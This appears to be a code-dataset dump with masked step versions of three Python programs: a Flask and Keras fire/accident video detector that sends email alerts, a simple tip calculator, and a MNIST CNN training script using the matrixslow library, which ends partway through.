print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
if __name__ == '__main__':
app.run(debug=False)
<|reserved_special_token_1|>
# USAGE
# python predict_video.py --model model/activity.model --label-bin model/lb.pickle --input example_clips/lifting.mp4 --output output/lifting_128avg.avi --size 128
# python predict_video.py --model model/road_activity.model --label-bin model/rd.pickle --input example_clips/fire_footage.mp4 --output output/fire_footage2.avi --size 128
# import the necessary packages
from tensorflow.keras.models import load_model
from collections import deque
import numpy as np
import argparse
from mail import sendmail
import pickle
import imutils
import cv2
import datetime
import time
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
#MODEL_PATH = 'model/real_time.model'
#PICKLE_PATH = 'model/real_time.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/'+request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH,PICKLE_PATH,INPUT_VIDEO,OUTPUT_VIDEO,SIZE)
#load the trained model and label binarizer from disk
print("[INFO] loading model and label binarizer...")
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, "rb").read())
# initialize the image mean for mean subtraction along with the
# predictions queue
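        # (123.68, 116.779, 103.939 are the standard ImageNet RGB channel means)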
mean = np.array([123.68, 116.779, 103.939][::1], dtype="float32")
Q = deque(maxlen=SIZE)
# initialize the video stream, pointer to output video file, and
# frame dimensions
vs = cv2.VideoCapture(INPUT_VIDEO)
#vs = cv2.VideoCapture(0)
writer = None
(W, H) = (None, None)
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ""
que = deque()
# loop over frames from the video file stream
while True:
# read the next frame from the file
(grabbed, frame) = vs.read()
count += 1.0
# if the frame was not grabbed, then we have reached the end
# of the stream
if not grabbed:
break
# if the frame dimensions are empty, grab them
if W is None or H is None:
(H, W) = frame.shape[:2]
# clone the output frame, then convert it from BGR to RGB
# ordering, resize the frame to a fixed 224x224, and then
# perform mean subtraction
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype("float32")
frame -= mean
# make predictions on the frame and then update the predictions
# queue
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
# perform prediction averaging over the current history of
# previous predictions
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count("fire") + que.count("accident")
if que.count("fire") > que.count("accident"):
caseDetect = "fire"
else:
caseDetect = "accident"
# draw the activity on the output frame
text = "Alert!!: {}".format(label)
# Changes starts here
alert = ["fire", "accident"]
#currentFrame = 0
#print(label, flag)
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.FONT_HERSHEY_SIMPLEX,
1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
else:
if flag == 1:
end_frame = count - 10
flag = 2
#name = './frame/frame'+str(currentFrame)+'.jpg'
#cv2.imwrite(name,output)
# check if the video writer is None
if writer is None:
# initialize our video writer
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30,
(W, H), True)
# write the output frame to disk
writer.write(output)
# show the output image
cv2.imshow("Output", output)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# changes made here
if annotation != "":
status = sendmail("[email protected]", "Anomaly Detected!!!", "yes")
status = status['email_status']
#total_time = end_time - start_time
#print("Time is: {}".format(str(datetime.timedelta(seconds=(total_time)))))
print("count: {}".format(count))
#print("Frame count: {}".format(f_start))
# release the file pointers
print("[INFO] cleaning up...")
writer.release()
vs.release()
start_frame = start_frame//30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count, start_time=start_frame, end_time=end_frame,
status = status)
if __name__ == '__main__':
app.run(debug=False)
|
flexible
|
{
"blob_id": "ccfcc5b644d592090786ceb35a85124c9d3275ad",
"index": 5719,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n",
"step-4": "from tensorflow.keras.models import load_model\nfrom collections import deque\nimport numpy as np\nimport argparse\nfrom mail import sendmail\nimport pickle\nimport imutils\nimport cv2\nimport datetime\nimport time\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n",
"step-5": "# USAGE\n# python predict_video.py --model model/activity.model --label-bin model/lb.pickle --input example_clips/lifting.mp4 --output output/lifting_128avg.avi --size 128\n# python predict_video.py --model model/road_activity.model --label-bin model/rd.pickle --input example_clips/fire_footage.mp4 --ou\n# tput output/fire_footage2.avi --size 128\n\n# import the necessary packages\nfrom tensorflow.keras.models import load_model\nfrom collections import deque\nimport numpy as np\nimport argparse\nfrom mail import sendmail\nimport pickle\nimport imutils\nimport cv2\nimport datetime\nimport time\nfrom flask import Flask, render_template, request\n\n\napp = Flask(__name__)\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n #MODEL_PATH = 'model/real_time.model'\n #PICKLE_PATH = 'model/real_time.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/'+request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n\n print(MODEL_PATH,PICKLE_PATH,INPUT_VIDEO,OUTPUT_VIDEO,SIZE)\n #load the trained model and label binarizer from disk\n print(\"[INFO] loading model and label binarizer...\")\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, \"rb\").read())\n\n # initialize the image mean for mean subtraction along with the\n # predictions queue\n mean = np.array([123.68, 116.779, 103.939][::1], dtype=\"float32\")\n Q = deque(maxlen=SIZE)\n\n # initialize the video stream, pointer to output video file, and\n # frame dimensions\n vs = cv2.VideoCapture(INPUT_VIDEO)\n #vs = cv2.VideoCapture(0)\n writer = None\n (W, H) = (None, None)\n\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = \"\"\n que = deque()\n # loop over frames from the video file stream\n while True:\n # read the next frame from the file\n (grabbed, frame) = vs.read()\n count += 1.0\n # if the frame was not grabbed, then we have reached the end\n # of the stream\n if not grabbed:\n break\n\n # if the frame dimensions are empty, grab them\n if W is None or H is None:\n (H, W) = frame.shape[:2]\n\n # clone the output frame, then convert it from BGR to RGB\n # ordering, resize the frame to a fixed 224x224, and then\n # perform mean subtraction\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype(\"float32\")\n frame -= mean\n\n # make predictions on the frame and then update the predictions\n # queue\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n # perform prediction averaging over the current history of\n # previous predictions\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count(\"fire\") + que.count(\"accident\")\n if que.count(\"fire\") > que.count(\"accident\"):\n caseDetect = \"fire\"\n else:\n caseDetect = \"accident\"\n # draw the activity on the output frame\n text = \"Alert!!: {}\".format(label)\n\n # Changes starts here\n alert = 
[\"fire\", \"accident\"]\n\n #currentFrame = 0\n #print(label, flag)\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.FONT_HERSHEY_SIMPLEX,\n 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n else:\n if flag == 1:\n end_frame = count - 10\n flag = 2\n\n #name = './frame/frame'+str(currentFrame)+'.jpg'\n #cv2.imwrite(name,output)\n\n # check if the video writer is None\n if writer is None:\n # initialize our video writer\n fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30,\n (W, H), True)\n\n # write the output frame to disk\n writer.write(output)\n\n # show the output image\n cv2.imshow(\"Output\", output)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n # changes made here\n\n if annotation != \"\":\n status = sendmail(\"[email protected]\", \"Anomaly Detected!!!\", \"yes\")\n status = status['email_status']\n\n #total_time = end_time - start_time\n #print(\"Time is: {}\".format(str(datetime.timedelta(seconds=(total_time)))))\n print(\"count: {}\".format(count))\n #print(\"Frame count: {}\".format(f_start))\n # release the file pointers\n print(\"[INFO] cleaning up...\")\n writer.release()\n vs.release()\n start_frame = start_frame//30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count, start_time=start_frame, end_time=end_frame,\n status = status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# Tip Calculator
# Dan Soloha
# 9/12/2019
total = int(input("What was the total your bill came to? "))
print(f"With a total of {total}, you should tip ${int(total + (total * 0.15))}. If the waiter did a really good job, you should tip ${int(total + (total * 0.20))}. ") # Multiplying by 1.x was returning the number rounded down for some reason
|
normal
|
{
"blob_id": "45d5c75a993ff50e1a88510bdb16e963403c5356",
"index": 8588,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n f'With a total of {total}, you should tip ${int(total + total * 0.15)}. If the waiter did a really good job, you should tip ${int(total + total * 0.2)}. '\n )\n",
"step-3": "total = int(input('What was the total your bill came to? '))\nprint(\n f'With a total of {total}, you should tip ${int(total + total * 0.15)}. If the waiter did a really good job, you should tip ${int(total + total * 0.2)}. '\n )\n",
"step-4": "# Tip Calculator\r\n# Dan Soloha\r\n# 9/12/2019\r\n\r\ntotal = int(input(\"What was the total your bill came to? \"))\r\nprint(f\"With a total of {total}, you should tip ${int(total + (total * 0.15))}. If the waiter did a really good job, you should tip ${int(total + (total * 0.20))}. \") # Multiplying by 1.x was returning the number rounded down for some reason",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 24 12:16:15 2020
@author: zhangjuefei
"""
import sys
sys.path.append('../..')
import numpy as np
from sklearn.datasets import fetch_openml
from sklearn.preprocessing import OneHotEncoder
import matrixslow as ms
# Load the MNIST dataset, take a subset of the samples and normalise it
X, y = fetch_openml('mnist_784', version=1, return_X_y=True)
X, y = X[:1000] / 255, y.astype(np.int)[:1000]
# Convert the integer labels to One-Hot encoding
oh = OneHotEncoder(sparse=False)
one_hot_label = oh.fit_transform(y.values.reshape(-1, 1))
# Input image dimensions
img_shape = (28, 28)
# Input image
x = ms.core.Variable(img_shape, init=False, trainable=False)
# One-Hot label
one_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)
# First convolutional layer
conv1 = ms.layer.conv([x], img_shape, 3, (5, 5), "ReLU")
# First pooling layer
pooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))
# Second convolutional layer
conv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), "ReLU")
# Second pooling layer
pooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))
# Fully connected layer
fc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, "ReLU")
# Output layer
output = ms.layer.fc(fc1, 120, 10, "None")
# Class probabilities
predict = ms.ops.SoftMax(output)
# Cross-entropy loss
loss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)
# Learning rate
learning_rate = 0.005
# Optimizer
optimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)
# Batch size
batch_size = 32
# Training
for epoch in range(60):
batch_count = 0
for i in range(len(X)):
feature = np.mat(X.values[i]).reshape(img_shape)
label = np.mat(one_hot_label[i]).T
x.set_value(feature)
one_hot.set_value(label)
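        # one_step() runs a forward/backward pass for this sample and
        # accumulates its gradients; update() below applies the averaged
        # mini-batch step.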
optimizer.one_step()
batch_count += 1
if batch_count >= batch_size:
print("epoch: {:d}, iteration: {:d}, loss: {:.3f}".format(epoch + 1, i + 1, loss.value[0, 0]))
optimizer.update()
batch_count = 0
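    # End-of-epoch evaluation: forward pass over the same 1000-sample subset,
    # taking the argmax of the predicted class probabilities for each image.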
pred = []
for i in range(len(X)):
        feature = np.mat(X.values[i]).reshape(img_shape)  # use the underlying array, matching the training loop
x.set_value(feature)
predict.forward()
pred.append(predict.value.A.ravel())
pred = np.array(pred).argmax(axis=1)
accuracy = (y == pred).astype(np.int).sum() / len(X)
print("epoch: {:d}, accuracy: {:.3f}".format(epoch + 1, accuracy))
|
normal
|
{
"blob_id": "63f155f7da958e9b6865007c701f7cf986b0cbac",
"index": 7800,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.append('../..')\n<mask token>\nfor epoch in range(60):\n batch_count = 0\n for i in range(len(X)):\n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n x.set_value(feature)\n one_hot.set_value(label)\n optimizer.one_step()\n batch_count += 1\n if batch_count >= batch_size:\n print('epoch: {:d}, iteration: {:d}, loss: {:.3f}'.format(epoch +\n 1, i + 1, loss.value[0, 0]))\n optimizer.update()\n batch_count = 0\n pred = []\n for i in range(len(X)):\n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n predict.forward()\n pred.append(predict.value.A.ravel())\n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n print('epoch: {:d}, accuracy: {:.3f}'.format(epoch + 1, accuracy))\n",
"step-3": "<mask token>\nsys.path.append('../..')\n<mask token>\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX, y = X[:1000] / 255, y.astype(np.int)[:1000]\noh = OneHotEncoder(sparse=False)\none_hot_label = oh.fit_transform(y.values.reshape(-1, 1))\nimg_shape = 28, 28\nx = ms.core.Variable(img_shape, init=False, trainable=False)\none_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)\nconv1 = ms.layer.conv([x], img_shape, 3, (5, 5), 'ReLU')\npooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))\nconv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), 'ReLU')\npooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))\nfc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, 'ReLU')\noutput = ms.layer.fc(fc1, 120, 10, 'None')\npredict = ms.ops.SoftMax(output)\nloss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)\nlearning_rate = 0.005\noptimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)\nbatch_size = 32\nfor epoch in range(60):\n batch_count = 0\n for i in range(len(X)):\n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n x.set_value(feature)\n one_hot.set_value(label)\n optimizer.one_step()\n batch_count += 1\n if batch_count >= batch_size:\n print('epoch: {:d}, iteration: {:d}, loss: {:.3f}'.format(epoch +\n 1, i + 1, loss.value[0, 0]))\n optimizer.update()\n batch_count = 0\n pred = []\n for i in range(len(X)):\n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n predict.forward()\n pred.append(predict.value.A.ravel())\n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n print('epoch: {:d}, accuracy: {:.3f}'.format(epoch + 1, accuracy))\n",
"step-4": "<mask token>\nimport sys\nsys.path.append('../..')\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.preprocessing import OneHotEncoder\nimport matrixslow as ms\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX, y = X[:1000] / 255, y.astype(np.int)[:1000]\noh = OneHotEncoder(sparse=False)\none_hot_label = oh.fit_transform(y.values.reshape(-1, 1))\nimg_shape = 28, 28\nx = ms.core.Variable(img_shape, init=False, trainable=False)\none_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)\nconv1 = ms.layer.conv([x], img_shape, 3, (5, 5), 'ReLU')\npooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))\nconv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), 'ReLU')\npooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))\nfc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, 'ReLU')\noutput = ms.layer.fc(fc1, 120, 10, 'None')\npredict = ms.ops.SoftMax(output)\nloss = ms.ops.loss.CrossEntropyWithSoftMax(output, 